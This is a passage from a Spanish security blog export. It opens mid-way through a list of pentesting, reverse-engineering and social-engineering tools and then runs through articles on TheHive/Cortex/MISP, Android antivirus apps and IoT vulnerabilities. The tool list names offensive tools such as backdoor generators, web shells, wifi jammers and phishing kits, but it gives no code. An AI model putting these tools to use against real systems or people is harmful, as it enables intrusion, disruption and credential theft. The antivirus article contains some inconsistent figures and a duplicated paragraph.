Tgcd: Una sencilla herramienta de red Unix para ampliar la accesibilidad de los servicios de red basados en TCP / IP más allá de los cortafuegos. TheFatRat: Una herramienta fácil de generar backdoor con msfvenom (una parte del marco metasploit). Esta herramienta compila un malware con una carga popular y luego el malware compilado se puede ejecutar en Windows, Android, Mac. El malware que se creó con esta herramienta también tiene la capacidad de eludir la mayoría de la protección de software AV. WCE: El Editor de credenciales de Windows (WCE) es una herramienta de seguridad para listar sesiones de inicio de sesión y agregar, cambiar, enumerar y eliminar credenciales asociadas. ### Informes de pentesting Dradis - Colaboración y presentación de informes para los equipos de seguridad de TI. Faraday: Plataforma colaborativa de prueba de penetración y gestión de vulnerabilidades. ### Servicios Sslstrip: Una demostración de los ataques de stripping de HTTPS. Sslstrip2: Versión SSLStrip para derrotar a HSTS. SSLyze: Escáner de configuración SSL. Tls_prober: Fingerprint la implementación SSL / TLS de un servidor. ### Formación en Hacking Do not Panic - Training linux bind shell con técnicas anti-ingeniería inversa. DVWA: Damn Vulnerable Web Application (DVWA) es una aplicación web PHP / MySQL que es muy vulnerable. DVWS: Damn Vulnerable Web Sockets (DVWS) es una aplicación web vulnerable que funciona en sockets web para la comunicación entre el cliente y el servidor. OWASP Juice Shop: Una aplicación web intencionalmente insegura para entrenamientos de seguridad escrita enteramente en Javascript que abarca todo el OWASP Top Ten y otros graves fallos de seguridad. OWASP NodeGoat: Un entorno para conocer cómo los principales riesgos de seguridad de OWASP se aplican a las aplicaciones web desarrolladas con Node.js y cómo abordarlas de manera efectiva. OWASP Railsgoat: Una versión vulnerable de Rails que sigue el Top 10 de OWASP. OWASP Security Shepherd: Una plataforma de capacitación en seguridad para aplicaciones web y móviles. OWASP WebGoat: una aplicación web deliberadamente insegura. RopeyTasks: Aplicación web deliberadamente vulnerable. ### Pentesting Web Arachni: Framework de escáner de seguridad de aplicaciones web. BlindElephant: Aplicación web Fingerprinter. Burp Suite: Una plataforma integrada para realizar pruebas de seguridad de aplicaciones web. CMS-explorer: CMS Explorer está diseñado para revelar los módulos, complementos, componentes y temas específicos que varios sitios web controlados por CMS están ejecutando. Dvcs-ripper: Rip sistemas de control de versiones accesibles (distribuidos). Fimap: Encuentre, prepare, audite, explote e incluso busque automáticamente errores de LFI/RFI en google. Joomscan: escáner Joomla CMS. Kadabra: LFI Exploiter y Scanner automáticos, escritos en C ++ y un par módulo externo en Python. Kadimus: Herramienta de escaneo y explotación LFI. Liffy: Herramienta de explotación LFI. Netsparker: Escáner de seguridad de aplicaciones web. Nikto2: Escáner de vulnerabilidad de aplicaciones web. NoSQLMap: Base de datos de Mongo automatizada y herramienta de explotación de aplicaciones web NoSQL. OWASP Xenotix: XSS Exploit Framework es un marco avanzado de detección y explotación de vulnerabilidades Cross Site Scripting (XSS). Paros: Un proxy HTTP / HTTPS basado en Java para evaluar la vulnerabilidad de la aplicación web. Ratproxy: Una herramienta de auditoría de seguridad de aplicaciones web semi-automatizada, en gran medida pasiva, optimizada para una detección precisa y sensible, y una anotación automática, de problemas potenciales. Scout2: Herramienta de auditoría de seguridad para entornos AWS. Skipfish: Una herramienta de reconocimiento de seguridad de aplicaciones web activa. Prepara un mapa de sitio interactivo para el sitio objetivo llevando a cabo un rastreo recursivo y sondeos basados en el diccionario. SQLMap: Inyección SQL automática y herramienta de toma de control de base de datos. SQLNinja: Herramienta de inyección y adquisición de SQL Server. TPLMap: Herramienta de detección y explotación de inyección de plantilla automática del lado del servidor. Yasuo: Un script de ruby que busca aplicaciones web de terceros vulnerables y explotables en una red. W3af: Ataque a la aplicación web y marco de auditoría. Wapiti: Escáner de vulnerabilidad de aplicaciones web. Weevely3: Caparazón web armado. WhatWeb: Sitio web Fingerprinter. Framework de explotación de Wordpress: Framework de Ruby para desarrollar y utilizar módulos que ayudan en las pruebas de penetración de sitios web y sistemas con tecnología de WordPress. WPScan: WPScan es un escáner de vulnerabilidad WordPress de recuadro negro. WPSploit: Explotando Wordpress con Metasploit. WS-Attacker: un marco modular para pruebas de penetración de servicios web. XSS-payload-list: lista de carga útil XSS. Zed Attack Proxy (ZAP): El proyecto central de OWASP ZAP. ### Pentesting Wireless Aircrack-ng: Un programa de descifrado de claves 802.11 WEP y WPA-PSK. Kismet: Detector de red inalámbrica, sniffer e IDS. LANs.py: Inyectar código, bloquear wifi y espiar a los usuarios de wifi. Mass-deauth: Secuencia de comandos para la desauthentication de 802.11. Reaver: Ataque de fuerza bruta contra Wifi Protected Setup. Wifikill: un programa de Python para expulsar a la gente de wifi. Wifijammer: Satura continuamente todos los clientes / enrutadores wifi. Wifite: Herramienta automatizada de ataque inalámbrico. Wifiphisher: Ataques automatizados de phishing contra redes Wi-Fi. ## Ciberseguridad ### Seguridad cloud Azucar: herramienta de auditoría de seguridad para entornos Azure. ### Seguridad en endpoint AIDE: Advanced Intrusion Detection Environment es un comprobador de integridad de archivos y directorios. Duckhunt: Previene ataques de RubberDucky (u otra inyección de teclado). Hardentools: una utilidad que desactiva una serie de características riesgosas de Windows. Lynis: Herramienta de auditoría de seguridad para Linux, macOS y sistemas basados en UNIX. Ayuda con las pruebas de cumplimiento (HIPAA / ISO27001 / PCI DSS) y el endurecimiento del sistema. Sin agente, e instalación opcional. Osx-config-check: Verifica la configuración de tu máquina OS X. Xnumon: Supervisor macOS para detectar actividad maliciosa. ### Privacidad GoSecure: Un sistema de red privada virtual (VPN) fácil de usar y portátil construido con Linux y una Raspberry Pi. I2P: El proyecto de Internet invisible. Nipe: Una secuencia de comandos para hacer que Tor Network sea tu puerta de enlace predeterminada. SecureDrop: Sistema de envío de denuncia de fuente abierta que las organizaciones de medios pueden usar para aceptar documentos de forma segura y comunicarse con fuentes anónimas. Tor: El software gratuito para habilitar el anonimato en línea de enrutamiento onion. ## Ingenieria inversa AndBug: Un depurador que apunta a la máquina virtual Dalvik de la plataforma Android diseñada para ingenieros y desarrolladores inversos. Angr: Un marco de análisis binario independiente de la plataforma desarrollado por el Laboratorio de seguridad informática de UC Santa Barbara y su equipo CTF asociado, Shellphish. Apk2Gold: Otro decompilador de Android. ApkTool: Una herramienta para la ingeniería inversa Android archivos apk. Barf: Análisis binario y marco de ingeniería inversa. BinText: Un extractor de texto pequeño, muy rápido y potente. BinWalk: Analiza, aplica ingeniería inversa y extrae imágenes de firmware. Boomerang: Descomprime binarios x86 en C. Bytecode-viewer: Java 8 Jar y Android APK Reverse Engineering Suite (Descompilador, Editor, Depurador y más). Bytecode_graph: Módulo diseñado para modificar el bytecode de Python. Permite agregar o eliminar instrucciones de una cadena de código de byte de Python. Capstone: Marco de desmontaje ligero multi-plataforma y multi-arquitectura con enlaces de Python. CHIPSEC: Marco de evaluación de la seguridad de la plataforma. Coda: Analizador de Coredump. Ctf_import: Ejecuta funciones básicas desde binarios sin formato multiplataforma. Edb: Un depurador multiplataforma x86 / x86-64. Dex2jar: Herramientas para trabajar con archivos android .dex y java .class. Distorm: Potente biblioteca de desensamblador para x86 / AMD64. DotPeek: Un descompilador de .NET gratuito de JetBrains. Enjarify: Una herramienta para traducir bytecode de Dalvik a bytecode de Java equivalente. Esto permite que las herramientas de análisis de Java analicen las aplicaciones de Android. Fibratus: Herramienta para explorar y rastrear el kernel de Windows. Fino: Una herramienta de análisis dinámica de Android. Flare-ida: Utilidades IDA Pro del equipo FLARE. Frida: Inyecta JavaScript para explorar aplicaciones nativas en Windows, MacOS, Linux, iOS, Android y QNX. Gdb-dashboard: Interfaz visual modular para GDB en Python. GEF: Características mejoradas GDB de multi-arquitectura para explotadores e ingenieros inversos. Heap-viewer: Un plugin de IDA Pro para examinar el montón de glibc, centrado en el desarrollo de exploits. Hopper: Desensamblador / Descompilador de OS X y Linux para ejecutables de Windows / Mac / Linux / iOS de 32/64 bits. Idaemu: Es un complemento IDA Pro, se usa para emular código en IDA Pro. IDA Free: La versión gratuita de IDA. IDA Patcher: IDA Patcher es un complemento para el desensamblador IDA Pro de Hex-Ray diseñado para mejorar la capacidad de IDA de parchar archivos binarios y memoria. IDA Pomidor: IDA Pomidor es un complemento para el desensamblador IDA Pro de Hex-Ray que lo ayudará a conservar la concentración y la productividad durante largas sesiones de inversión. IDA Pro: Desinstalador y depurador multiprocesador alojado en Windows, Linux o Mac OS X. IDA Sploiter: IDA Sploiter es un complemento para el desensamblador IDA Pro de Hex-Ray diseñado para mejorar las capacidades de IDA como una herramienta de desarrollo de vulnerabilidades y desarrollo. IDAPython: Un complemento de IDA que hace posible escribir scripts para IDA en el lenguaje de programación de Python. Immunity Debugger: Una nueva y poderosa forma de escribir exploits y analizar malware. JAD: JAD Java Decompiler. Jadx: Descompilar archivos de Android. JD-GUI: Tiene como objetivo desarrollar herramientas para descompilar y analizar el código de 5 bytes de Java "y las versiones posteriores. Keystone Engine: Un armazón liviano multiplataforma y multi-arquitectura. Krakatau: Descompilador, ensamblador y desensamblador de Java. Manticore: Herramienta de creación de prototipos para el análisis binario dinámico, con soporte para ejecución simbólica, análisis de contaminación e instrumentación binaria. Framework MARA: Una aplicación móvil Ingeniería inversa y Marco de análisis. Medusa: Un desensamblador diseñado para ser modular e interactivo. MegaDumper: Vuelque ensamblajes nativos y .NET. Mona.py: PyCommand for Immunity Debugger que reemplaza y mejora en pvefindaddr. OllyDbg: Un depurador x86 que enfatiza el análisis de código binario. Paimei: Marco de ingeniería inversa, incluye PyDBG, PIDA, pGRAPH. PEDA: Python Exploit Development Assistance para GDB. Plasma: Desensamblador interactivo para x86 / ARM / MIPS. Genera pseudocódigo sangrado con código de sintaxis coloreado. Procyon: Un decompilador Java de código abierto moderno. Pyew: Editor y desensamblador hexadecimal de línea de comandos, principalmente para analizar malware. Qira: QEMU Interactive Runtime Analyzer. R2MSDN: complemento R2 para agregar las URL de la documentación de MSDN y los nombres de los parámetros a las llamadas a funciones importadas. RABCDAsm: Robust ABC (Código de bytes de ActionScript) [Dis-] Ensamblador. Radare2: Opensource, framework de ingeniería inversa crossplatform. Redexer: Una herramienta de reingeniería que manipula binarios de aplicaciones de Android. ScratchABit: Desensamblador interactivo fácilmente redirigible y pirateable con API de complemento compatible con IDAPython. Shed: .NET runtime inspector. Simplify: Desobfutador de Android genérico. Smali: Smali / baksmali es un ensamblador / desensamblador para el formato dex utilizado por dalvik, la implementación Java VM de Android. Toolbag: IDA Toolbag es un complemento que proporciona una funcionalidad adicional para el desensamblador Hex-Rays IDA Pro. Ufgraph: Un script simple que analiza el resultado del comando uf (desunir función) en windbg y usa graphviz para generar un flujograma de control como PNG/SVG/PDF/GIF (ver la opción -of). Uncompile: Descompilar Python 2.7 binarios (.pyc). Unicorn Engine: Un marco de emulador de CPU liviano, multiplataforma y multi-arquitectura basado en QEMU. Voltron: Un conjunto de herramientas de interfaz de usuario extensible depurador escrito en Python. Su objetivo es mejorar la experiencia del usuario de varios depuradores (LLDB, GDB, VDB y WinDbg) al permitir la conexión de vistas de utilidad que pueden recuperar y visualizar datos del host del depurador. WinDbg: Kit de controladores de Windows y WinDbg. WinHex: Editor hexadecimal, útil en el campo de la informática forense, la recuperación de datos, el procesamiento de datos de bajo nivel y la seguridad de TI. Unlinker: Unlinker es una herramienta que puede extraer funciones de binarios compilados de Visual C ++ y producir archivos de objeto COFF de Visual C ++. UPX: The Ultimate Packer para eXecutables. X64_dbg: Un depurador x64 / x32 de código abierto para Windows. Xxxswf: Una secuencia de comandos Python para analizar archivos Flash. YaCo: Un plugin IDA de Hex-Rays. Cuando está habilitado, múltiples usuarios pueden trabajar simultáneamente en el mismo binario. Cualquier modificación realizada por cualquier usuario se sincroniza a través del control de versión de git. ## Ingeniería social ### Framework SET: The Social-Engineer Toolkit de TrustedSec. ### Harvester Creepy: Una herramienta de geolocalización OSINT. Github-dorks: Herramienta de CLI para escanear repos/organizaciones de Github en busca de posibles fugas de información confidencial. Maltego: Software propietario para inteligencia de código abierto y análisis forense, de Paterva. Metagoofil: Metadata harvester. TheHarvester: Cosechadora de nombres de correo electrónico, subdominios y personas. TTSL: Herramienta para eliminar a LinkedIn. ### Phishing Whatsapp-phishing: Código de prueba de principio para ejecutar un ataque de phishing contra el cliente web oficial de Whatsapp. --- # Un trio perfecto con TheHive, Cortex y MISP URL: https://ciberseguridad.blog/un-trio-perfecto-con-thehive-cortex-y-misp/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-09-08 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > TheHive, Cortex y MISP funcionan muy bien. Desde los feed de alertas SIEM, hasta su tratamiento en los equipos de respuesta a incidentes. ¡DESCUBRELOS! TheHive, Cortex y MISP funcionan muy bien juntos: [Imagen: TheHive_Cortex_MISP] ## TheHive TheHive es una plataforma de respuesta a incidentes de seguridad (SIRP). Puede recibir alertas de diferentes fuentes (SIEM, IDS, correo electrónico, etc.) a través de su API REST, y es aquí donde los alimentadores de alerta entran en juego. ### Alertas y Feeds en The Hive Piensa en un feed de alerta como un programa especializado que consume un evento de seguridad (alerta SIEM, informe de correo electrónico, alerta de IDS, etc.), lo analiza y emite una alerta que envía a TheHive a través de TheHive4py, la biblioteca de Python que para interactua con la API REST de TheHive. Los feed dependeran de nuestra plataforma o sistemas de detección, pueden ser muy variadas dependiendo del entorno, pero desarrollar los mismos debería ser sencillo. Cualquier alerta enviada a TheHive se mostrará en el panel de alertas. Además de las fuentes mencionadas anteriormente, los eventos MISP nuevos o actualizados se mostrarán también en esa área si configuramos TheHive para conectarse a una o varias instancias MISP. Si es así, TheHive sondeará las instancias MISP cada cierto intervalo buscando eventos nuevos o actualizados. Si hay alguno, TheHive lo sabrá y generará una alerta que terminará en su panel, como podemos ver: [Imagen: alertas_MISP_TheHive] Las alertas se pueden ignorar, marcar como leídas, previsualizar e importar. Cuando se importa una alerta, se convierte en un caso que necesita ser investigado. ### Casos en TheHive Se puede generar un caso a partir de una alerta o crear desde cero. Se subdivide en tareas (pensar en identificación, contención, erradicación, verificar registros de proxy, etc.) y observables (direcciones IP, hashes, direcciones de correo electrónico, nombres de dominio, URL ...). Cuando los analistas están trabajando en tareas, agregan registros a medida que avanzan. En la terminología de TheHive, los registros son entradas de texto que pueden contener archivos adjuntos para ayudar a los analistas a registrar lo que han estado haciendo. Los registros se pueden escribir usando Markdown o un editor de texto enriquecido. No es necesario agregar las mismas tareas una y otra vez cuando trabajamos en casos que pertenecen a una categoría determinada (DDoS, spam, APT, ...). Podemos crear plantillas personalizadas a las que agregar tareas como vemos en la siguiente imagen. Siendo muy útil cuando se trata de alertas para que cuando las importemos, podamos seleccionar qué plantilla de caso deseamos aplicar y ¡listo! [Imagen: plantilla_theHive] ### Observables en TheHive Los observables pueden etiquetarse, marcarse como IOCs y analizarse. Cuando la investigación esté en progreso o finalizada, es posible que deseemos compartir los IOC resultantes o un subconjunto de aquellos con lagunos "socios". Todos los observables deben tener un nivel TLP (Protocolo de Semáforo). Por defecto, cualquier observable agregado se considera TLP: AMBAR. Debemos tener en cuenta que algunos analizadores tienen en cuenta el TLP. ¡Espera! Si, hemos dicho Analizadores. ## Cortex Cortex es un motor de análisis independiente y un compañero perfecto para TheHive y MISP. Los analistas pueden usarlo para analizar observables utilizando su interfaz web de usuario, en cuyo caso pueden enviarse solo de uno en uno. La interfaz web de usuario debería estar limitada a evaluaciones rápidas de observables antes de crear un caso en TheHive (o en un SIRP alternativo). El poder de Cortex realmente entra en juego cuando usamos su API REST. TheHive habla nativamente a Cortex (como lo hace MISP). Pudiendo TheHive además aprovechar uno o varios servidores de Cortex. [Imagen: Caso_CORTEX] ### Analizadores en Cortex Cortex tiene 39 analizadores. Un analizador puede escribirse en cualquier lenguaje de programación admitido por Linux, aunque todos sus analizadores actuales están escritos en Python. Esto se debe a que proporcionamos una biblioteca de Python llamada Cortexutils que contiene un conjunto de clases de utilidad que hacen que sea más fácil escribir un analizador en Python. Los analizadores como VirusTotal, PassiveTotal o DomainTools pueden proporcionar diferentes servicios de análisis. Si tomamos VirusTotal como ejemplo. Podemos escanear un archivo o URL. También podemos obtener el último informe disponible en VirusTotal.com para un archivo, hash, dominio o dirección IP. ## MISP En este punto, debemos mencionar un analizador especial que puede crear cierta confusión si no se entiende correctamente: el analizador de búsqueda MISP. Gracias a el, Cortex tiene la capacidad de buscar observables dentro de una instancia MISP como se representa en la primera de las imagenes del post. Cuando se encuentra un observable en un evento, Cortex devolverá el número de registros encontrados (es decir, el número de eventos donde se ha encontrado el observable) y una lista de enlaces a esos eventos con datos adicionales. [Imagen: observables_MISP] ### Módulos de expansión MISP Además de sus propios analizadores (que incluyen la búsqueda MISP descrita anteriormente), Cortex también puede invocar módulos de expansión MISP. Estos son normalmente utilizados por MISP para enriquecer los atributos dentro de los eventos, pero Cortex también puede aprovecharlos para analizar los observables. Existe cierta superposición entre los analizadores Cortex nativos y los módulos de expansión MISP. Al elegir entre un analizador nativo o un módulo de expansión, es encarecidamente recomendable seleccionar el primero de ellos. Los módulos de expansión están desactivados en la configuración predeterminada de Cortex. ### Trabajos en MISP Cuando envíamos un observable para el análisis, Cortex creará un trabajo y, si tiene éxito, generará un informe de análisis en formato JSON. TheHive tiene la capacidad de analizar esos resultados y presentarlos de forma amigable para los seres humanos. Cuando enviemos un observable a Cortex desde TheHive, obtendremos un informe breve y uno largo. El primero se puede considerar como un Resumen del Analista de Exec muy pequeño, mientras que el segundo proporciona más información y detalles. ### Llamando a Cortex desde MISP Además de los módulos de expansión que acabamos de mencionar, MISP 2.4.73 y posteriores pueden enriquecer atributos utilizando analizadores Cortex. La configuración es bastante simple. Si todo lo que nos preocupa es la inteligencia y el intercambio de amenazas, podemos aumentar nuestra visibilidad de una amenaza dada, representada como un evento MISP aprovechando los analizadores de Cortex. ## Conclusión TheHive, Cortex y MISP son tres productos de código abierto y gratuitos que pueden ayudarnos a combatir las amenazas y mantener a raya a los "malos". TheHive, como SIRP, nos permite investigar incidentes de seguridad de forma rápida y colaborativa. Varios analistas pueden trabajar simultáneamente en tareas y casos. Si bien los casos se pueden crear desde cero, TheHive puede recibir alertas de diferentes fuentes gracias a los alimentadores de alertas que consumen eventos de seguridad generados por múltiples fuentes y los alimentan a TheHive utilizando la biblioteca TheHive4py mencionada. TheHive también se puede sincronizar con una o varias instancias MISP para recibir eventos nuevos y actualizados que aparecerán en el panel de alertas con todas las otras alertas generadas por otras fuentes. Posteriormente, los analistas pueden obtener una vista previa de las nuevas alertas para decidir si se debe actuar o no. Si es así, se pueden transformar en casos de investigación utilizando plantillas. Para analizar los observables recopilados de una investigación y/o importados de un evento MISP, TheHive puede confiar en uno o varios motores de análisis Cortex. Cortex es otro producto independiente, cuyo único propósito es permitirnos analizar observables a escala gracias a su gran cantidad de analizadores, módulos de expansión MISP y cualquier analizador desarrollado. Cortex tiene una API REST que se puede utilizar para potenciar otros productos de seguridad, como software de "análisis", SIRP alternativo o MISP. La popular plataforma de uso compartido de amenazas, puede de hecho enriquecer los atributos gracias a Cortex, ya que tiene una integración nativa con él. Por que como ya hemos visto, la colaboración es clave en ciberseguridad. --- # 🥇Los 12 mejores antivirus para Android URL: https://ciberseguridad.blog/los-12-mejores-antivirus-para-android/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-09-02 Actualizado: 2026-10-04 Tema: Aplicaciones y Herramientas > AV-Test a publicado el listado de los mejores antivirus para Android. ✅ Nosotros te traemos y analizamos los 12 mejores para que estes libre de Malware De acuerdo con las evaluaciones AV-TEST de julio de 2018 de 21 aplicaciones de seguridad en Android. Las tasas de detección para todas las aplicaciones probadas están en los rangos de 54.8%, con un promedio de 96.9%. ACTUALIZACIÓN 2019 : A esta lista, añadimos un nuevo integrante, que ademas se cuela en la primera posición, debido a la alta calidad demostrada y el reducido precio. Son muchas las personas que me han preguntado, si realmente es necesario un antivirus en los smartphone. Hay diferencias, debido a la permisibilidad de acceso al sistema entre Android e iOS, pero si hablamos de este primero, podriamos decir que SI. [Vídeo](https://www.youtube.com/watch?v=QhiCIL8EhL8) ## Panda Mobile Security [Imagen: PandaMobileSecurity] Debido a la creciente popularidad y uso de los teléfonos inteligentes y de los datos personales que contienen, los virus y el malware han comenzado a dirigirse a los teléfonos inteligentes, especialmente a los dispositivos Android. Es por eso que es necesario tomar todas las precauciones posibles y proteger tu smartphone. Podeis adquirirlo desde Panda Security. Mas allá de el antivirus, nos permitira crear códigos de acceso a nuestras webs, o realizar bloqueos de llamadas, así como auditar nuestra privacidad. Desde hace tiempo, Panda lleva demostrando su valía e imponiendose como lider en el sector de la seguridad, ya no solo a nivel antivirus, si no a nivel de seguridad corporativa. [Imagen: antivirus_comparatives] ## AhnLab V3 Mobile Security [Imagen: ahnlab_v3_mobile_sec] AhnLab V3 Mobile Security tiene una puntuacción de protección y usabilidad perfecta. Le falta unas pocas características, sin soporte para encriptación, filtrado de mensajes o respaldo de datos es muy buena. Ofrece un bloqueo de aplicaciones y un asesor de privacidad. ## Alibaba Mobile Security [Imagen: Alibaba-Mobile-Security] Al igual que todas las demás herramientas antimalware de Android, Alibaba Mobile Security detectó todos los malware recientemente descubiertos y todos los demás malware conocidos anteriormente. Verificó todas las casillas de usabilidad y no dio falsos positivos. Tiene un buen conjunto de características que incluye antirrobo, bloqueo de llamadas, filtrado de mensajes, navegación segura y bloqueo de aplicaciones. Sin embargo, carece de control parental, copia de seguridad de datos personales y encriptación. ## Avast Mobile Security [Imagen: AVAST] Avast Mobile Security 6.10 logró la detección de malware Android en tiempo real el 99.8 por ciento de las veces. Encontró el 100% del último malware de Android descubierto durante las cuatro semanas previas. La aplicación no afecta negativamente la duración de la batería o hace que el dispositivo se vuelva lento durante el uso normal. No registró falsos positivos durante la instalación y el uso de aplicaciones legítimas de Google Play o tiendas de aplicaciones de terceros. Las características de navegación segura de Mobile Security ayudan a proteger contra ataques de phishing y sitios web maliciosos, y ofrece funciones antirrobo, como el borrado remoto. Las características adicionales no evaluadas por AV-TEST incluyen un bloqueo de aplicación, un asesor de privacidad y seguridad wi-fi. ## AVG AntiVirus Free 6.10 [Imagen: AVG-AntiVirus-Free] AVG AntiVirus Free tenía una tasa de detección perfecta del 99,8 por ciento para la detección de malware en tiempo real y una tasa de detección del 100% para el malware de última generación. No dio falsos positivos. Tiene un conjunto de características que incluyen bloqueo de llamadas, bloqueo de aplicaciones, seguridad wi-fi y respaldo de datos personales. Sin embargo, carece de un filtro de mensajes, control parental y encriptación. Avira Antivirus Security obtuvo un puntaje alto en la detección de malware de Android en tiempo real (99.8%) como en la detección de malware de Android descubierto en las últimas cuatro semanas (99.8%). La aplicación no afecta la duración del rendimiento de la batería y no dio advertencias falsas. Las características especiales incluyen protección de identidad, bloqueo de aplicaciones, asesor de privacidad y búsqueda segura. No brinda cifrado ni siquiera controles parentales. ## Avira Antivirus Security 5.2 [Imagen: Avira-Antivirus-Security] Avira Antivirus Security obtuvo una puntaación alta tanto en la detección de malware Android en tiempo real (99.8%) como en la detección de malware de Android descubierto en las últimas cuatro semanas (99.8 por ciento). La aplicación no afecta la duración o el rendimiento de la batería y no dio falsos positivos. Las características especiales incluyen protección de identidad, bloqueo de aplicaciones, asesor de privacidad y búsqueda segura. No brinda cifrado ni ofrece controles parentales. ## Bitdefender Mobile Security Version 3.3 [Imagen: -Bitdefender-Mobile-Security] La detección de malware en Android de Bitdefender Mobile Security en tiempo real es del 100%, y descubrió las últimas amenazas de Android descubiertas en las últimas cuatro semanas el 100% del tiempo también. Para la usabilidad, la aplicación obtiene grandes marcas de verificación para no reducir la duración de la batería o la velocidad del dispositivo. AV-TEST no detectó falsos positivos durante la instalación / uso de aplicaciones legítimas de Google Play y tiendas de aplicaciones de terceros. A diferencia de algunas aplicaciones de protección contra malware de Android, la seguridad móvil de Bitdefender ofrece características antirrobo, que incluyen bloqueo remoto, borrado y localización, así como navegación segura y protección contra phishing. Al igual que muchas otras herramientas de seguridad en Android, no incluye el filtrado de mensajes o el bloqueo de llamadas y no admite todos los tipos de cifrado. Las características adicionales no evaluadas incluyen bloqueo de aplicaciones y un asesor de privacidad. ## G Data Internet Security Version 26.3 [Imagen: G-Data] Internet Security de G Data tiene más funciones que muchos de sus otros competidores mejor calificados. AV-TEST verificó las casillas de bloqueo remoto, borrado y localización, bloqueo de llamadas, filtrado de mensajes, navegación segura, control parental, y soporte para todo el cifrado. La única 'x' que recibió la aplicación fue para no permitir que los datos personales se guarden en una tarjeta SD o en el almacenamiento en la nube. Por otro lado, la tasa de detección de malware Android en tiempo real de Internet Security fue del 100%, mientras que detectó amenazas descubiertas en las últimas cuatro semanas al 100%. La excelente puntuación de usabilidad resultó de no afectar negativamente la duración de la batería, reducir el rendimiento del dispositivo o generar demasiado tráfico. La aplicación emitió cero advertencias falsas durante la instalación en el uso de aplicaciones legítimas de Google Play y tiendas de aplicaciones de terceros. ## Kaspersky Lab Internet Security Versión 11.17 [Imagen: Karspersky-lab] El escáner de malware Android de Kaspersky Lab capturó los últimos malware de Android en tiempo real el 99.8% de las veces y las últimas amenazas descubiertas el mes anterior el 100% del tiempo. La puntuación de usabilidad perfecta de la aplicación es el resultado de no afectar la duración de la batería o ralentizar el rendimiento. El conjunto de características es más robusto que la mayoría, con bloqueo remoto, limpieza y ubicación, bloqueo de llamadas, filtrado de mensajes, y una protección segura de navegación / antiphishing, aunque el producto de seguridad de Internet de G Data ofrece algunas características más. Las características adicionales no probadas incluyen protección de privacidad y protección antiphishing para textos. ## McAfee Mobile Security Version 5.0 [Imagen: MCafee-Antivirus-Android] El escáner de malware de McAfee Mobile Security para Android detectó fallas en tiempo real el 99% de las veces y detectó malware detectado en las últimas cuatro semanas el 99.9% de las veces. Al igual que con todas las demás aplicaciones en este resumen, la usabilidad fue estelar. El conjunto de características de la aplicación es sólido, incluido un conjunto completo de herramientas antirrobo, bloqueo de llamadas, navegación segura y protección contra phishing, y la capacidad de guardar datos personales en una tarjeta SD o en la nube. Sin embargo, Mobile Security no admite todos los tipos de cifrado ni el filtrado de mensajes de texto. Otras características no probadas incluyen un optimizador de batería, privacidad y bloqueo de aplicaciones. ## Symantec Norton Mobile Security 4.2 [Imagen: Symantec-Norton-Mobile-Security] Symantec Norton Mobile Security capturó el 100% de todos los programas maliciosos de Android, incluidos los descubiertos recientemente, sin advertencias falsas. Tiene un buen conjunto de funciones de usabilidad, que incluyen navegación segura, copia de seguridad de datos personales, antirrobo y bloqueo de llamadas. Las funciones no revisadas incluyen un asesor de aplicaciones, seguridad wi-fi y un bloqueo de aplicaciones. ## Tencent WeSecure 1.4 [Imagen: Tencent-WeSecure] Con WeSecure de Tencent, no obtendremos funciones antirrobo (bloqueo remoto, borrado y localización). AV-TEST no incluyó ninguna característica adicional digna de mención que no se haya probado, pero obtendremos bloqueo de llamadas, protección de navegación segura / antiphishing y la capacidad de realizar copias de seguridad de datos personales en tarjetas SD o en la nube. La aplicación detectó detección de nuevo malware en tiempo real, atrapándolo el 99.9% de las veces, y detectó nuevo malware reportado en las cuatro semanas previas el 100% del tiempo. La usabilidad fue excelente, sin inconvenientes para la duración o el rendimiento de la batería y sin advertencias falsas. ## Trend Micro Mobile Security and Antivirus 9.5 [Imagen: Mobile-Security-and-Antivirus] Mobile Security and Antivirus de Trend Micro comprueba la mayoría de las cajas de características: antirrobo, bloqueo de llamadas, filtrado de mensajes de texto, navegación segura y protección antiphishing y control parental. Además, hay un escáner de privacidad, protección de mensajería y protección de red. La aplicación logró una tasa de detección del 100% de nuevo malware en tiempo real, así como de las amenazas descubiertas en los últimos cuatro meses. La usabilidad también fue excelente, sin resistencia a la duración o el rendimiento de la batería y cero advertencias falsas ### Conclusiones Para 2019, el malware móvil representará cerca del 33% de todo el malware informado en pruebas estándar, hasta del 7,5% actual, según la "Guía de Market for Mobile Threat Defense Solutions" de Gartner de agosto de 2017. Aunque los dispositivos iOS no son inmunes al malware ". La amenaza de malware móvil proviene principalmente de Android ", según Dionisio Zumerle, director de investigación de Gartner. La amenaza debería ser una preocupación para todas las compañías con usuarios de Android, especialmente para aquellos con grandes flotas de dispositivos Android o que están en verticales de alta seguridad como finanzas, salud y gobierno. [Imagen: Aplicaciones-Android-Maliciosas] El malware en Android también se está volviendo más sofisticado. Si consideramos el ransomware DoubleLocker-Android que la empresa de seguridad de TI ESET detectó recientemente. DoubleLocker es capaz de cambiar el PIN del dispositivo, lo que impide que los usuarios accedan a sus dispositivos. Puede encriptar los datos en el dispositivo. Es un doble golpe, como no se ha visto antes en el ecosistema de Android, según indica ESET. ¿Las buenas noticias? La seguridad de Android está mejorando, y la diversidad de aplicaciones de seguridad disponibles para la plataforma es sólida. Eso significa que hay más de un conjunto de obstáculos que los malos deben eliminar para tener una campaña de malware altamente exitosa. --- # Comprobando vulnerabilidades en dispositivos Internet of Things (IoT) URL: https://ciberseguridad.blog/comprobando-vulnerabilidades-en-dispositivos-internet-of-things-iot/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-08-09 Actualizado: 2026-10-04 Tema: Internet de las cosas > Los dispositivos Internet of Things (IoT) tienen un crecimiento exponencial. Comprobar sus vulnerabilidades es esencial para un futuro ecosistema seguro. El Internet of Things (IoT) abarca todos y cada uno de los productos que están conectados a Internet o entre ellos. Cualquier producto que requiera conexión a una red doméstica, desde un automóvil o desde una oficina para entregar un conjunto completo de características, cae bajo este amplio término. De hecho, los automóviles en sí son ahora componentes IoT, ya que intercambian datos con el fabricante de forma continua. Todo lo relacionado con la I/O, recopila datos durante el uso y, a menudo, comparte esa información con sus fabricantes sin que los usuarios sepan que se está recopilando. En muchos casos, las funciones del producto dependen de la conexión a Internet. Este concepto de hacer que todos los componentes de nuestras vidas se comuniquen entre sí, con nosotros, y con las aplicaciones de software internas y externas, es de lo que define IoT. ## IoT como sinónimo de poca seguridad Los fabricantes de todo tipo de dispositivos electrónicos o eléctricos se apresuran a agregar funciones que requieren conexión a Internet. En su prisa por 